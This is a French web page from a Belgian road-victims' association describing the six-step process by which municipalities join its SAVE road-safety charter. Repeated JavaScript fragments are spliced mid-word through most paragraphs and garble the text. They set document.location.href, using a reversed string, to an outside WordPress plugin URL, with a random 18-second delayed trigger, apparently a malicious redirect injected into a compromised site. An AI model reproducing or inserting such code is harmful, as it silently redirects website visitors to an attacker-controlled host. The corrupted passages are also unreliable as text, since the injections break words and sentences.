Grâce à la charte SAVE Villes & Communes, l’association Parents d’Enfants Victimes de la Route (PEVR) souhaite associer les villes et les communes belges à son combat pour une meilleure sécurité routière.

Sur ce site, vous trouverez les informations relatives à la charte SAVE ainsi que des renseignements complémentaires sur PEVR et sur son fonctionnement

Approche

Le projet complet consiste en un processus par étapes que la commune doit suivre à partir du moment où elle s’engage.

Les étapes suivantes doivent être franchies :

Etape 1: signature de la charte SAVE Villes & Communes

La première étape est la signature officielle de la charte SAVE (de préférence lors d’une conférence de presse) par la commune/ville. En signant la charte, elle démontre qu’elle souhaite contribuer de façon active à la gestion de la sécurité routière, durant minimum une année.

Etape 2: inventaire des initiatives existantes qui se rattachent à la charte SAVE

Après la signature officielle de la charte SAVE, la commune réalise toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout d’abord un inventaire des initiatives déjà existantes qui sont prises dans le domaine de la mobilité et de la sécurité routière. Il est important d’avoir une vue d’ensemble de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes ces initiatives afin de s’assurer de ne pas faire deux fois le travail ou de ne pas passer à côté de certaines actions déjà entreprises dans la commune/ville.

Etape 3: élaboration du plan d’action

Après l’inventaire de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes les initiatives existantes, la commune élabore un plan d’action en collaboration avec le coordinateur de projet de PEVR.

Dans ce plan d’action, l’administration communale retranscrit, de façon détaillée, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes les initiatives qui seront prises afin de respecter la charte SAVE. L’idée est que la commune s’engage à mettre en œuvre un ou plusieurs objectif(s) de la charte.

Pour l’élaboration du plan d’action, la commune reçoit l’aide du coordinateur de projet de PEVR et peut utiliser, comme fil conducteur, le ‘Manuel d’élaboration du Plan d’Action pour la Sécurité Routière’ rédigé par PEVR.

Lorsque le plan d’action est terminé, il est soumis au comité d’étude de PEVR. Si ce dernier l’approuve, la mise en œuvre du plan d’action peut commencer.

Etape 4: mise en œuvre du plan d’action

Après l’approbation du plan d’action, la commune/ville peut commencer à le mettre en œuvreLe coordinateur de projet de PEVR prendra régulièrement contact avec l’administration afin de suivre les progrès et de résoudre les éventuels problèmes.

Le coordinateur de projet de PEVR peut également être contacté par la commune/ville en cas de problème. L’entité dispose d’une année afin de mettre en œuvre le plan d’action pour la sécurité routière.

Etape 5: évaluation de l’exécution du plan d’action

Après la période allouée pour la mise en œuvre du plan d’action (approximativement un an), le coordinateur de projet de PEVR réalise un rapport final. Dans celui-ci, il indique toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les résultats concrets apportés par les initiatives et les effets que cela entraîne en faveur de la sécurité routière. Il indique également quelles initiatives n’ont pas pu être réalisées ainsi que les raisons.

Le rapport est ensuite soumis au comité d’étude de PEVR qui va en évaluer l’efficacité. Si le résultat final est positif, la commune/ville passe à la sixième étape.

Etape 6: remise du label SAVE et placement d’un panneau SAVE pour les Villes & Communes

Si le comité d’étude de PEVR a approuvé le rapport d’évaluation du plan d’action, le label SAVE est officiellement remis à la commune/ville et celle-ci peut alors procéder au placement du panneau SAVE. Le label ainsi que le panneau SAVE indiquent au monde extérieur que la commune/ville est bel et bien active en matière de sécurité routière. De préférence, cet événement se déroule lors d’une conférence de presse au cours de laquelle la commune/ville s’engage pour une nouvelle année et signe donc à nouveau la charte SAVE.

Il est demandé à la commune participante une contribution annuelle au projet s’élevant à 0.01 € (1 cent) par habitant.

La commune/ville est soutenue et guidée par le coordinateur de projet de PEVR durant toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes ces étapes et peut également prendre contact avec cette personne quand elle le souhaite et ce, à toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout moment durant le processus.

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